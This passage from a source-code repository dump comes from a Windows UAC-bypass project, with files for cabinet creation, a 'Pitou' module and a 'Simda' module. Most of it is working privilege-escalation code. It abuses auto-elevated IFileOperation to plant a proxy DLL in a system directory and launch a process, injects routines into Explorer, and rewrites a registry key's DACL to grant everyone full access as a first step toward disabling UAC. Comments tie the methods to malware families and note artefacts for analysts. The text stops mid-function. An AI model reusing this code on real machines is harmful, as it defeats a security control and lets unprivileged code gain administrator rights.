    CHAR szStoredName[CB_MAX_FILENAME];

    if (Cabinet == NULL) {
        return FALSE;
    }

    // Source path to ANSI.
    RtlSecureZeroMemory(szSource, sizeof(szSource));
    if (WideCharToMultiByte(CP_ACP, 0, lpszFileName, -1, szSource, CB_MAX_FILENAME - 2, 0, NULL) == 0) {
        return FALSE;
    }

    // In-cabinet name to ANSI.
    RtlSecureZeroMemory(szStoredName, sizeof(szStoredName));
    if (WideCharToMultiByte(CP_ACP, 0, lpszInternalName, -1, szStoredName, CB_MAX_FILENAME - 2, 0, NULL) == 0) {
        return FALSE;
    }

    return FCIAddFile(Cabinet->hfci, szSource, szStoredName, FALSE,
        fnFCIGETNEXTCABINET, fnFCISTATUS, fnFCIGETOPENINFO, tcompTYPE_NONE);
}
400 |
/*
 * cabClose
 *
 * Purpose:
 *
 * Flush file and destroy cabinet class.
 *
 * Accepts NULL.  The result of FCIFlushCabinet is not checked, so a
 * failure to write the final data is silent; Cabinet is always freed.
 */
VOID cabClose(
    _In_ CABDATA *Cabinet
)
{
    if (Cabinet != NULL) {
        // Commit pending data before the FCI context goes away.
        FCIFlushCabinet(Cabinet->hfci, FALSE, fnFCIGETNEXTCABINET, fnFCISTATUS);
        FCIDestroy(Cabinet->hfci);
        HeapFree(GetProcessHeap(), 0, Cabinet);
    }
}
427 |
--------------------------------------------------------------------------------
/BypassUAC/makecab.h:
--------------------------------------------------------------------------------
1 | /*******************************************************************************
2 | *
3 | * (C) COPYRIGHT AUTHORS, 2015 - 2016
4 | *
5 | * TITLE: MAKECAB.H
6 | *
7 | * VERSION: 2.00
8 | *
9 | * DATE: 12 Nov 2015
10 | *
11 | * Prototypes and definitions for makecab module.
12 | *
13 | * THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF
14 | * ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED
15 | * TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A
16 | * PARTICULAR PURPOSE.
17 | *
18 | *******************************************************************************/
19 | #pragma once
20 |
21 | #include
22 | #include
23 |
/*
 * Per-cabinet state shared by cabCreate / cabAddFile / cabClose.
 * Allocated from the process heap by cabCreate and released by cabClose.
 */
typedef struct _CABDATA {
    ERF erf;    // FCI error record handed to FCICreate
    CCAB cab;   // cabinet parameters (szCab = output name, cb = maximum size)
    HFCI hfci;  // FCI context returned by FCICreate
} CABDATA, *PCABDATA;

/* Create a cabinet object for lpszCabName; NULL on failure.  Release with cabClose. */
CABDATA *cabCreate(
    _In_ LPWSTR lpszCabName
);

/* Add lpszFileName to Cabinet under the in-cabinet name lpszInternalName (stored uncompressed). */
BOOL cabAddFile(
    _In_ CABDATA *Cabinet,
    _In_ LPWSTR lpszFileName,
    _In_ LPWSTR lpszInternalName
);

/* Flush pending data, destroy the FCI context and free Cabinet (NULL is accepted). */
VOID cabClose(
    _In_ CABDATA *Cabinet
);
43 |
44 |
--------------------------------------------------------------------------------
/BypassUAC/pitou.c:
--------------------------------------------------------------------------------
1 | /*******************************************************************************
2 | *
3 | * (C) COPYRIGHT AUTHORS, 2014 - 2015
4 | *
5 | * TITLE: PITOU.C
6 | *
7 | * VERSION: 2.00
8 | *
9 | * DATE: 16 Nov 2015
10 | *
11 | * Leo Davidson work based AutoElevation and Pitou new variant.
12 | *
13 | * THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF
14 | * ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED
15 | * TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A
16 | * PARTICULAR PURPOSE.
17 | *
18 | *******************************************************************************/
19 | #include "global.h"
20 | #include
21 |
// Parameter blocks passed to ucmInjectExplorer.  They are file-scope rather than
// stack locals — presumably so they stay valid for the remote routine; each public
// entry point zeroes and refills its own block before use.
ELOAD_PARAMETERS g_ElevParams;     // used by ucmStandardAutoElevation
ELOAD_PARAMETERS_3 g_ElevParams3;  // used by ucmAutoElevateCopyFile
24 |
/*
 * ucmElevatedLoadProc
 *
 * Purpose:
 *
 * Bypass UAC using AutoElevated IFileOperation.
 * Refactored Leo Davidson concept.
 *
 * Sequence (the do/while runs once; every break is an early exit on a
 * non-S_OK result):
 *   1. CoCreateInstance of elvpar->xCLSID — checked, then released at once;
 *   2. CoGetObject on elvpar->EleMoniker to obtain the moniker-bound
 *      IFileOperation, with elevation flags set via SetOperationFlags;
 *   3. MoveItem(SourceFilePathAndName -> DestinationDir) + PerformOperations;
 *   4. ShellExecuteExW of ExePathAndName (working directory DestinationDir)
 *      and an INFINITE wait on the started process;
 *   5. DeleteItem of the moved file (DestinationDir + name part of the
 *      source path) through the same IFileOperation.
 *
 * Every API is reached through the function pointers in elvpar, never
 * through this module's import table — presumably because the routine is
 * run inside another process by ucmInjectExplorer (not visible here).
 *
 * Returns the last HRESULT (S_OK on full success), or E_FAIL cast to DWORD
 * when elvpar is NULL.
 *
 * Analyst notes: the observable artefacts are the file landing in
 * DestinationDir, the process started from ExePathAndName, and the later
 * deletion.  The name is appended to DestinationDir without inserting a
 * separator, so DestinationDir is expected to end with one; the
 * concatenation into textbuf (MAX_PATH * 2 WCHARs) is not bounded here.
 */
DWORD WINAPI ucmElevatedLoadProc(
    PELOAD_PARAMETERS elvpar
)
{
    HRESULT r;
    BOOL cond = FALSE;                       // single-pass loop; break == early exit
    IFileOperation *FileOperation1 = NULL;
    IShellItem *isrc = NULL, *idst = NULL;
    BIND_OPTS3 bop;
    SHELLEXECUTEINFOW shexec;
    WCHAR textbuf[MAX_PATH * 2], *p, *f, *f0;

    if (elvpar == NULL)
        return (DWORD)E_FAIL;

    r = elvpar->xCoInitialize(NULL);
    if (r != S_OK)
        return r;                            // S_FALSE (already initialised) is treated as failure too

    RtlSecureZeroMemory(&bop, sizeof(bop));
    RtlSecureZeroMemory(&shexec, sizeof(shexec));

    do {
        // Plain activation first; the instance is dropped immediately and only the
        // moniker-bound object below is used.
        r = elvpar->xCoCreateInstance(&elvpar->xCLSID, NULL,
            CLSCTX_INPROC_SERVER | CLSCTX_LOCAL_SERVER | CLSCTX_INPROC_HANDLER, &elvpar->xIID, &FileOperation1);

        if (r != S_OK) {
            break;
        }

        // NOTE(review): the pointer is not reset to NULL after this Release; the
        // cleanup below relies on CoGetObject overwriting it (or nulling it on failure).
        if (FileOperation1 != NULL) {
            FileOperation1->lpVtbl->Release(FileOperation1);
        }

        bop.cbStruct = sizeof(bop);
        bop.dwClassContext = CLSCTX_INPROC_SERVER | CLSCTX_LOCAL_SERVER | CLSCTX_INPROC_HANDLER;
        r = elvpar->xCoGetObject(elvpar->EleMoniker, (BIND_OPTS *)&bop, &elvpar->xIID, &FileOperation1);
        if (r != S_OK) {
            break;
        }
        if (FileOperation1 == NULL) {
            r = E_FAIL;
            break;
        }

        // Silent, unconfirmed operation that requires elevation.
        FileOperation1->lpVtbl->SetOperationFlags(FileOperation1,
            FOF_NOCONFIRMATION | FOF_SILENT | FOFX_SHOWELEVATIONPROMPT | FOFX_NOCOPYHOOKS | FOFX_REQUIREELEVATION);

        r = elvpar->xSHCreateItemFromParsingName(elvpar->SourceFilePathAndName,
            NULL, &elvpar->xIID_IShellItem, &isrc);

        if (r != S_OK) {
            break;
        }
        r = elvpar->xSHCreateItemFromParsingName(elvpar->DestinationDir, NULL, &elvpar->xIID_IShellItem, &idst);
        if (r != S_OK) {
            break;
        }

        // Move (not copy): the source no longer exists at its original path afterwards.
        r = FileOperation1->lpVtbl->MoveItem(FileOperation1, isrc, idst, NULL, NULL);
        if (r != S_OK) {
            break;
        }
        r = FileOperation1->lpVtbl->PerformOperations(FileOperation1);
        if (r != S_OK) {
            break;
        }

        idst->lpVtbl->Release(idst);
        idst = NULL;
        isrc->lpVtbl->Release(isrc);
        isrc = NULL;

        // Start the target process and wait for it to finish; the launch result is not checked.
        shexec.cbSize = sizeof(shexec);
        shexec.fMask = SEE_MASK_NOCLOSEPROCESS;
        shexec.nShow = SW_SHOW;
        shexec.lpFile = elvpar->ExePathAndName;
        shexec.lpParameters = NULL;
        shexec.lpDirectory = elvpar->DestinationDir;
        if (elvpar->xShellExecuteExW(&shexec))
            if (shexec.hProcess != NULL) {
                elvpar->xWaitForSingleObject(shexec.hProcess, INFINITE);
                elvpar->xCloseHandle(shexec.hProcess);
            }

        // textbuf = DestinationDir ...
        f0 = textbuf;
        p = (WCHAR *)elvpar->DestinationDir;
        while (*p != (WCHAR)0) {
            *f0 = *p;
            f0++;
            p++;
        }
        *f0 = 0;

        // ... followed by the part of the source path after its last backslash.
        f = (WCHAR *)elvpar->SourceFilePathAndName;
        p = f;
        while (*f != (WCHAR)0) {
            if (*f == (WCHAR)'\\')
                p = (WCHAR *)f + 1;
            f++;
        }

        while (*p != (WCHAR)0) {
            *f0 = *p;
            f0++;
            p++;
        }
        *f0 = 0;

        r = elvpar->xSHCreateItemFromParsingName(textbuf, NULL, &elvpar->xIID_IShellItem, &idst);
        if (r != S_OK) {
            break;
        }

        // Remove the moved file again; the result of this PerformOperations is ignored.
        r = FileOperation1->lpVtbl->DeleteItem(FileOperation1, idst, NULL);
        if (r != S_OK) {
            break;
        }
        FileOperation1->lpVtbl->PerformOperations(FileOperation1);

    } while (cond);

    if (FileOperation1 != NULL) {
        FileOperation1->lpVtbl->Release(FileOperation1);
    }
    if (isrc != NULL) {
        isrc->lpVtbl->Release(isrc);
    }
    if (idst != NULL) {
        idst->lpVtbl->Release(idst);
    }

    elvpar->xCoUninitialize();
    return r;
}
169 |
/*
 * ucmCreateCallParameters
 *
 * Purpose:
 *
 * Fill common part of call parameters.
 *
 * Parameters is treated as PELOAD_PARAMETERS, yet ucmAutoElevateCopyFile
 * passes an ELOAD_PARAMETERS_3; the two structures are therefore assumed
 * to share this leading layout — TODO confirm against their definitions.
 *
 * Sets the elevation moniker (IFILEOP_ELEMONIKER), the IFileOperation and
 * IShellItem IIDs and the FileOperation CLSID, and resolves the ole32 /
 * shell32 / kernel32 entry points from the module handles in g_ctx.
 * None of the GetProcAddress results is checked, so a NULL pointer would
 * only surface when the elevated routine calls through it.
 *
 * Returns FALSE only when Parameters is NULL, TRUE otherwise.
 */
BOOL ucmCreateCallParameters(
    PVOID Parameters
)
{
    BOOL bCond = FALSE, bResult = FALSE;     // single-pass loop; break == early exit
    PELOAD_PARAMETERS elvpar = (PELOAD_PARAMETERS)Parameters;

    do {

        if (Parameters == NULL) {
            break;
        }

        //elevation moniker
        _strcpy_w(elvpar->EleMoniker, IFILEOP_ELEMONIKER);

        elvpar->xIID = IID_IFileOperation;
        elvpar->xIID_IShellItem = IID_IShellItem;
        elvpar->xCLSID = CLSID_FileOperation;

        // Entry points the remote routine uses instead of its own imports (unchecked).
        elvpar->xCoInitialize = (pfnCoInitialize)GetProcAddress(g_ctx.hOle32, "CoInitialize");
        elvpar->xCoCreateInstance = (pfnCoCreateInstance)GetProcAddress(g_ctx.hOle32, "CoCreateInstance");
        elvpar->xCoGetObject = (pfnCoGetObject)GetProcAddress(g_ctx.hOle32, "CoGetObject");
        elvpar->xCoUninitialize = (pfnCoUninitialize)GetProcAddress(g_ctx.hOle32, "CoUninitialize");
        elvpar->xSHCreateItemFromParsingName = (pfnSHCreateItemFromParsingName)GetProcAddress(g_ctx.hShell32, "SHCreateItemFromParsingName");
        elvpar->xShellExecuteExW = (pfnShellExecuteExW)GetProcAddress(g_ctx.hShell32, "ShellExecuteExW");
        elvpar->xWaitForSingleObject = (pfnWaitForSingleObject)GetProcAddress(g_ctx.hKernel32, "WaitForSingleObject");
        elvpar->xCloseHandle = (pfnCloseHandle)GetProcAddress(g_ctx.hKernel32, "CloseHandle");
        elvpar->xOutputDebugStringW = (pfnOutputDebugStringW)GetProcAddress(g_ctx.hKernel32, "OutputDebugStringW");

        bResult = TRUE;

    } while (bCond);

    return bResult;
}
214 |
/*
 * ucmStandardAutoElevation
 *
 * Purpose:
 *
 * Leo Davidson AutoElevation method with derivatives.
 *
 * M1W7 - Original Leo Davidson concept.
 * M1W8 - Windows 8.1 adapted M1W7 (bypassing sysprep embedded manifest dlls redirection).
 * M1W7T - Leo Davidson concept with different target dll, used by Win32/Tilon.
 * M1W10 - Windows 10 adapted M1W7.
 * M1WALL - WinNT/Pitou derivative from Leo Davidson concept.
 *
 * Method selects the source DLL path, destination directory and process
 * to start from the M1W* constants (defined elsewhere); an unknown Method
 * returns FALSE before anything touches the disk.  The routine then
 *   1. zeroes g_ElevParams and fills the common part (ucmCreateCallParameters),
 *   2. expands lpSourceDll and writes ProxyDll (ProxyDllSize bytes) there
 *      with supWriteBufferToFile — the first on-disk artefact,
 *   3. expands the destination directory and target process path into
 *      g_ElevParams,
 *   4. hands g_ElevParams and ucmElevatedLoadProc to ucmInjectExplorer.
 *
 * Returns the result of ucmInjectExplorer, FALSE on any earlier failure.
 * The string fields of g_ElevParams are assumed to hold at least MAX_PATH
 * characters (the size passed to ExpandEnvironmentStringsW) and the M1W*
 * constants to fit szBuffer (MAX_PATH + 1) — neither is checked here.
 */
BOOL ucmStandardAutoElevation(
    UACBYPASSMETHOD Method,
    CONST PVOID ProxyDll,
    DWORD ProxyDllSize
)
{
    BOOL cond = FALSE, bResult = FALSE;      // single-pass loop; break == early exit
    LPWSTR lpSourceDll, lpTargetDir, lpTargetProcess;
    WCHAR szBuffer[MAX_PATH + 1];

    // Per-method paths; all but UacMethodOobe share the M1W7 target directory and process.
    switch (Method) {

    case UacMethodSysprep1:
        lpSourceDll = M1W7_SOURCEDLL;
        lpTargetDir = M1W7_TARGETDIR;
        lpTargetProcess = M1W7_TARGETPROCESS;
        break;

    case UacMethodSysprep2:
        lpSourceDll = M1W8_SOURCEDLL;
        lpTargetDir = M1W7_TARGETDIR;
        lpTargetProcess = M1W7_TARGETPROCESS;
        break;

    case UacMethodSysprep3:
        lpSourceDll = M1W10_SOURCEDLL;
        lpTargetDir = M1W7_TARGETDIR;
        lpTargetProcess = M1W7_TARGETPROCESS;
        break;

    case UacMethodOobe:
        lpSourceDll = M1WALL_SOURCEDLL;
        lpTargetDir = M1WALL_TARGETDIR;
        lpTargetProcess = M1WALL_TARGETPROCESS;
        break;

    case UacMethodTilon:
        lpSourceDll = M1W7T_SOURCEDLL;
        lpTargetDir = M1W7_TARGETDIR;
        lpTargetProcess = M1W7_TARGETPROCESS;
        break;

    default:
        return FALSE;
    }

    do {

        //setup call parameters
        RtlSecureZeroMemory(&g_ElevParams, sizeof(g_ElevParams));
        if (!ucmCreateCallParameters(&g_ElevParams)) {
            break;
        }

        //source filename
        if (ExpandEnvironmentStringsW(lpSourceDll,
            g_ElevParams.SourceFilePathAndName, MAX_PATH) == 0)
        {
            break;
        }

        // The proxy DLL is written to the expanded source path before anything else runs.
        if (!supWriteBufferToFile(g_ElevParams.SourceFilePathAndName,
            ProxyDll, ProxyDllSize))
        {
            break;
        }

        //dest directory
        RtlSecureZeroMemory(szBuffer, sizeof(szBuffer));
        _strcpy_w(szBuffer, lpTargetDir);

        if (ExpandEnvironmentStringsW(szBuffer,
            g_ElevParams.DestinationDir, MAX_PATH) == 0)
        {
            break;
        }

        //target
        RtlSecureZeroMemory(szBuffer, sizeof(szBuffer));
        _strcpy_w(szBuffer, lpTargetProcess);

        if (ExpandEnvironmentStringsW(szBuffer,
            g_ElevParams.ExePathAndName, MAX_PATH) == 0)
        {
            break;
        }

        bResult = ucmInjectExplorer(&g_ElevParams, ucmElevatedLoadProc);

    } while (cond);

    return bResult;
}
322 |
/*
 * ucmElevatedLoadProcEx
 *
 * Purpose:
 *
 * Bypass UAC using AutoElevated IFileOperation.
 * Special version.
 *
 * Same first half as ucmElevatedLoadProc — activation, moniker-bound
 * IFileOperation, MoveItem(SourceFilePathAndName -> DestinationDir),
 * PerformOperations — but it stops there: no process is started and the
 * moved file is not deleted afterwards.  All APIs go through the
 * function pointers in elvpar.
 *
 * Returns the last HRESULT (S_OK on success), or E_FAIL cast to DWORD
 * when elvpar is NULL.
 */
DWORD WINAPI ucmElevatedLoadProcEx(
    PELOAD_PARAMETERS_3 elvpar
)
{
    HRESULT r;
    BOOL cond = FALSE;                       // single-pass loop; break == early exit
    IFileOperation *FileOperation1 = NULL;
    IShellItem *isrc = NULL, *idst = NULL;
    BIND_OPTS3 bop;
    SHELLEXECUTEINFOW shexec;                // zeroed but never used in this variant

    if (elvpar == NULL)
        return (DWORD)E_FAIL;

    r = elvpar->xCoInitialize(NULL);
    if (r != S_OK)
        return r;                            // S_FALSE (already initialised) is treated as failure too

    RtlSecureZeroMemory(&bop, sizeof(bop));
    RtlSecureZeroMemory(&shexec, sizeof(shexec));

    do {
        // Plain activation first; the instance is dropped immediately.
        r = elvpar->xCoCreateInstance(&elvpar->xCLSID, NULL,
            CLSCTX_INPROC_SERVER | CLSCTX_LOCAL_SERVER | CLSCTX_INPROC_HANDLER, &elvpar->xIID, &FileOperation1);

        if (r != S_OK) {
            break;
        }

        // NOTE(review): not reset to NULL after Release; cleanup relies on CoGetObject overwriting it.
        if (FileOperation1 != NULL) {
            FileOperation1->lpVtbl->Release(FileOperation1);
        }

        bop.cbStruct = sizeof(bop);
        bop.dwClassContext = CLSCTX_INPROC_SERVER | CLSCTX_LOCAL_SERVER | CLSCTX_INPROC_HANDLER;
        r = elvpar->xCoGetObject(elvpar->EleMoniker, (BIND_OPTS *)&bop, &elvpar->xIID, &FileOperation1);
        if (r != S_OK) {
            break;
        }
        if (FileOperation1 == NULL) {
            r = E_FAIL;
            break;
        }

        FileOperation1->lpVtbl->SetOperationFlags(FileOperation1,
            FOF_NOCONFIRMATION | FOF_SILENT | FOFX_SHOWELEVATIONPROMPT | FOFX_NOCOPYHOOKS | FOFX_REQUIREELEVATION);

        r = elvpar->xSHCreateItemFromParsingName(elvpar->SourceFilePathAndName,
            NULL, &elvpar->xIID_IShellItem, &isrc);

        if (r != S_OK) {
            break;
        }
        r = elvpar->xSHCreateItemFromParsingName(elvpar->DestinationDir, NULL, &elvpar->xIID_IShellItem, &idst);
        if (r != S_OK) {
            break;
        }

        // Move (not copy): the source no longer exists at its original path afterwards.
        r = FileOperation1->lpVtbl->MoveItem(FileOperation1, isrc, idst, NULL, NULL);
        if (r != S_OK) {
            break;
        }
        r = FileOperation1->lpVtbl->PerformOperations(FileOperation1);
        if (r != S_OK) {
            break;
        }

        idst->lpVtbl->Release(idst);
        idst = NULL;
        isrc->lpVtbl->Release(isrc);
        isrc = NULL;

    } while (cond);

    if (FileOperation1 != NULL) {
        FileOperation1->lpVtbl->Release(FileOperation1);
    }
    if (isrc != NULL) {
        isrc->lpVtbl->Release(isrc);
    }
    if (idst != NULL) {
        idst->lpVtbl->Release(idst);
    }

    elvpar->xCoUninitialize();
    return r;
}
419 |
/*
 * ucmAutoElevateCopyFile
 *
 * Purpose:
 *
 * Copy file autoelevated.
 *
 * Despite the name, the routine it schedules (ucmElevatedLoadProcEx) uses
 * MoveItem, so SourceFileName is gone from its original location once the
 * operation succeeds.  Both strings are copied into g_ElevParams3 with
 * _strcpy_w and no length check (contrast ucmSimdaAlterObjectSecurity,
 * which bounds its inputs to MAX_PATH).  szBuffer is zeroed but otherwise
 * unused.
 *
 * Returns the result of ucmInjectExplorer; FALSE when either argument is
 * NULL or ucmCreateCallParameters fails.
 */
BOOL ucmAutoElevateCopyFile(
    LPWSTR SourceFileName,
    LPWSTR DestinationDir
)
{
    BOOL cond = FALSE, bResult = FALSE;      // single-pass loop; break == early exit
    WCHAR szBuffer[MAX_PATH + 1];

    do {
        if (
            (SourceFileName == NULL) ||
            (DestinationDir == NULL)
            )
        {
            break;
        }

        RtlSecureZeroMemory(&g_ElevParams3, sizeof(g_ElevParams3));

        //setup call parameters
        if (!ucmCreateCallParameters(&g_ElevParams3)) {
            break;
        }

        //dest directory
        RtlSecureZeroMemory(szBuffer, sizeof(szBuffer));
        // Unbounded copies: the caller is trusted to supply strings that fit the fields.
        _strcpy_w(g_ElevParams3.DestinationDir, DestinationDir);
        _strcpy_w(g_ElevParams3.SourceFilePathAndName, SourceFileName);
        bResult = ucmInjectExplorer(&g_ElevParams3, ucmElevatedLoadProcEx);

    } while (cond);

    return bResult;
}
462 |
--------------------------------------------------------------------------------
/BypassUAC/pitou.h:
--------------------------------------------------------------------------------
1 | /*******************************************************************************
2 | *
3 | * (C) COPYRIGHT AUTHORS, 2014 - 2016
4 | *
5 | * TITLE: PITOU.H
6 | *
7 | * VERSION: 2.00
8 | *
9 | * DATE: 16 Nov 2015
10 | *
11 | * Prototypes and definitions for Leo Davidson method.
12 | *
13 | * THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF
14 | * ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED
15 | * TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A
16 | * PARTICULAR PURPOSE.
17 | *
18 | *******************************************************************************/
19 | #pragma once
20 |
/*
 * Write ProxyDll (ProxyDllSize bytes) to the per-Method source path and run the
 * Leo Davidson IFileOperation sequence for that Method.  FALSE for an unknown
 * Method or any setup failure; otherwise the result of ucmInjectExplorer.
 */
BOOL ucmStandardAutoElevation(
    UACBYPASSMETHOD Method,
    CONST PVOID ProxyDll,
    DWORD ProxyDllSize
);

/*
 * Move SourceFileName into DestinationDir through the elevated IFileOperation
 * (a move, not a copy, despite the name).  Both arguments must be non-NULL and
 * are copied without a length check.
 */
BOOL ucmAutoElevateCopyFile(
    LPWSTR SourceFileName,
    LPWSTR DestinationDir
);
31 |
--------------------------------------------------------------------------------
/BypassUAC/simda.c:
--------------------------------------------------------------------------------
1 | /*******************************************************************************
2 | *
3 | * (C) COPYRIGHT AUTHORS, 2015 - 2016
4 | *
5 | * TITLE: SIMDA.C
6 | *
7 | * VERSION: 2.00
8 | *
9 | * DATE: 16 Nov 2015
10 | *
11 | * Simda based UAC bypass using ISecurityEditor.
12 | *
13 | * THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF
14 | * ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED
15 | * TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A
16 | * PARTICULAR PURPOSE.
17 | *
18 | *******************************************************************************/
19 |
20 | #include "global.h"
21 |
// Parameter block for ucmElevatedAlterSecurityProc, filled by ucmSimdaAlterObjectSecurity.
// Not zeroed before each use; every field the remote routine reads is assigned anew.
ELOAD_PARAMETERS_2 g_ElevParams2;
23 |
/*
 * ucmElevatedAlterSecurityProc
 *
 * Purpose:
 *
 * Change object security through ISecurityEditor(SetNamedInfo).
 *
 * Sequence (single-pass do/while, break == early exit):
 *   1. CoCreateInstance of xCLSID_ShellSecurityEditor — checked, released;
 *   2. CoGetObject on EleMoniker (CLSCTX_LOCAL_SERVER) for the
 *      moniker-bound ISecurityEditor;
 *   3. GetSecurity on szTargetObject; on success the returned string is
 *      written with OutputDebugStringW (and never freed — if it is a
 *      CoTaskMem string it leaks; confirm against the interface);
 *   4. SetSecurity with szNewSDDL, logged the same way on success.
 * A GetSecurity failure does not prevent SetSecurity from being tried.
 *
 * All APIs go through the function pointers in elvpar.  Returns the last
 * HRESULT — normally the SetSecurity result — or E_FAIL cast to DWORD
 * when elvpar is NULL.
 *
 * Analyst notes: both the current and the new security string are
 * emitted as debug output, which a debugger or a debug-output monitor on
 * the hosting process can capture.
 */
DWORD WINAPI ucmElevatedAlterSecurityProc(
    PELOAD_PARAMETERS_2 elvpar
)
{
    HRESULT r;
    BOOL cond = FALSE;                       // single-pass loop; break == early exit
    ISecurityEditor *SecurityEditor1 = NULL;
    BIND_OPTS3 bop;
    LPOLESTR pps;

    if (elvpar == NULL) {
        return (DWORD)E_FAIL;
    }

    r = elvpar->xCoInitialize(NULL);
    if (r != S_OK) {
        return r;                            // S_FALSE (already initialised) is treated as failure too
    }

    RtlSecureZeroMemory(&bop, sizeof(bop));

    do {
        // Plain activation first; the instance is dropped immediately.
        r = elvpar->xCoCreateInstance(&elvpar->xCLSID_ShellSecurityEditor, NULL,
            CLSCTX_INPROC_SERVER | CLSCTX_LOCAL_SERVER | CLSCTX_INPROC_HANDLER,
            &elvpar->xIID_ISecurityEditor, &SecurityEditor1);

        if (r != S_OK) {
            break;
        }

        // NOTE(review): not reset to NULL after Release; cleanup relies on CoGetObject overwriting it.
        if (SecurityEditor1 != NULL) {
            SecurityEditor1->lpVtbl->Release(SecurityEditor1);
        }

        bop.cbStruct = sizeof(bop);
        bop.dwClassContext = CLSCTX_LOCAL_SERVER;

        r = elvpar->xCoGetObject(elvpar->EleMoniker, (BIND_OPTS *)&bop,
            &elvpar->xIID_ISecurityEditor, &SecurityEditor1);

        if (r != S_OK)
            break;
        if (SecurityEditor1 == NULL) {
            r = E_FAIL;
            break;
        }

        // Read the current descriptor string; only used for debug output.
        pps = NULL;
        r = SecurityEditor1->lpVtbl->GetSecurity(
            SecurityEditor1,
            elvpar->szTargetObject,
            elvpar->ObjectType,
            elvpar->SecurityInformation,
            &pps
        );

        if ((r == S_OK) && (pps != NULL)) {
            elvpar->xOutputDebugStringW(pps);
        }

        // Apply the new SDDL regardless of whether GetSecurity succeeded.
        r = SecurityEditor1->lpVtbl->SetSecurity(
            SecurityEditor1,
            elvpar->szTargetObject,
            elvpar->ObjectType,
            elvpar->SecurityInformation,
            elvpar->szNewSDDL
        );

        if (r == S_OK) {
            elvpar->xOutputDebugStringW(elvpar->szNewSDDL);
        }


    } while (cond);

    if (SecurityEditor1 != NULL) {
        SecurityEditor1->lpVtbl->Release(SecurityEditor1);
    }

    elvpar->xCoUninitialize();

    return r;
}
115 |
/*
 * ucmSimdaAlterObjectSecurity
 *
 * Purpose:
 *
 * Set new entry in object DACL.
 *
 * Validates that lpTargetObject and lpSddlString are non-NULL and between
 * 1 and MAX_PATH characters, fills g_ElevParams2 (moniker string, the
 * ShellSecurityEditor CLSID and ISecurityEditor IID parsed from their
 * string forms, ObjectType, SecurityInformation, ole32/kernel32 entry
 * points — GetProcAddress results unchecked) and hands it with
 * ucmElevatedAlterSecurityProc to ucmInjectExplorer.
 *
 * Returns the result of ucmInjectExplorer, FALSE on validation or
 * CLSID/IID parsing failure.  g_ElevParams2 is not zeroed here; every
 * field the remote routine reads is assigned below.
 */
BOOL ucmSimdaAlterObjectSecurity(
    SE_OBJECT_TYPE ObjectType,
    SECURITY_INFORMATION SecurityInformation,
    LPWSTR lpTargetObject,
    LPWSTR lpSddlString
)
{
    BOOL cond = FALSE, bResult = FALSE;      // single-pass loop; break == early exit
    SIZE_T cch;

    //just a basic check
    if (
        (lpTargetObject == NULL) ||
        (lpSddlString == NULL)
        )
    {
        return FALSE;
    }

    // Bound both inputs so the fixed-size fields in g_ElevParams2 cannot overflow.
    cch = _strlen_w(lpTargetObject);
    if ((cch == 0) || (cch > MAX_PATH)) {
        return FALSE;
    }
    cch = _strlen_w(lpSddlString);
    if ((cch == 0) || (cch > MAX_PATH)) {
        return FALSE;
    }


    do {

        // Elevation moniker for the same class whose CLSID is parsed just below.
        _strcpy_w(g_ElevParams2.EleMoniker, L"Elevation:Administrator!new:{4D111E08-CBF7-4f12-A926-2C7920AF52FC}");
        _strcpy_w(g_ElevParams2.szTargetObject, lpTargetObject);
        _strcpy_w(g_ElevParams2.szNewSDDL, lpSddlString);

        if (CLSIDFromString(L"{4D111E08-CBF7-4f12-A926-2C7920AF52FC}",
            &g_ElevParams2.xCLSID_ShellSecurityEditor) != NOERROR)
        {
            break;
        }

        if (IIDFromString(L"{14B2C619-D07A-46EF-8B62-31B64F3B845C}",
            &g_ElevParams2.xIID_ISecurityEditor) != S_OK)
        {
            break;
        }

        g_ElevParams2.ObjectType = ObjectType;
        g_ElevParams2.SecurityInformation = SecurityInformation;
        // Entry points the remote routine uses instead of its own imports (unchecked).
        g_ElevParams2.xCoInitialize = (pfnCoInitialize)GetProcAddress(g_ctx.hOle32, "CoInitialize");
        g_ElevParams2.xCoCreateInstance = (pfnCoCreateInstance)GetProcAddress(g_ctx.hOle32, "CoCreateInstance");
        g_ElevParams2.xCoGetObject = (pfnCoGetObject)GetProcAddress(g_ctx.hOle32, "CoGetObject");
        g_ElevParams2.xCoUninitialize = (pfnCoUninitialize)GetProcAddress(g_ctx.hOle32, "CoUninitialize");
        g_ElevParams2.xOutputDebugStringW = (pfnOutputDebugStringW)GetProcAddress(g_ctx.hKernel32, "OutputDebugStringW");

        bResult = ucmInjectExplorer(&g_ElevParams2, ucmElevatedAlterSecurityProc);

    } while (cond);

    return bResult;
}
185 |
/*
 * ucmSimdaTurnOffUac
 *
 * Purpose:
 *
 * Disable UAC using AutoElevated undocumented ISecurityEditor interface.
 * Used by WinNT/Simda starting from 2010 year till today.
 *
 * Step 1 asks ucmSimdaAlterObjectSecurity to put T_SDDL_ALL_FOR_EVERYONE
 * on the DACL of the registry key T_UACKEY (both defined elsewhere).
 * Step 2 — opening HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\
 * policies\system with KEY_ALL_ACCESS and writing EnableLUA = 0 — is
 * guarded by bResult, which this function never assigns; as written the
 * function returns FALSE and only step 1 takes effect.
 *
 * Analyst notes: the observable side effect is a DACL rewrite on the
 * policies\system key; the debug string "[UCM] Key security compromised"
 * and the EnableLUA write belong to the guarded step.
 */
BOOL ucmSimdaTurnOffUac(
    VOID
)
{
    BOOL cond = FALSE, bResult = FALSE;      // single-pass loop; bResult is never assigned after this
    DWORD dwValue;
    LRESULT lRet;
    HKEY hKey;

    do {

        // Step 1: rewrite the key's DACL through the elevated ISecurityEditor.
        if (!ucmSimdaAlterObjectSecurity(
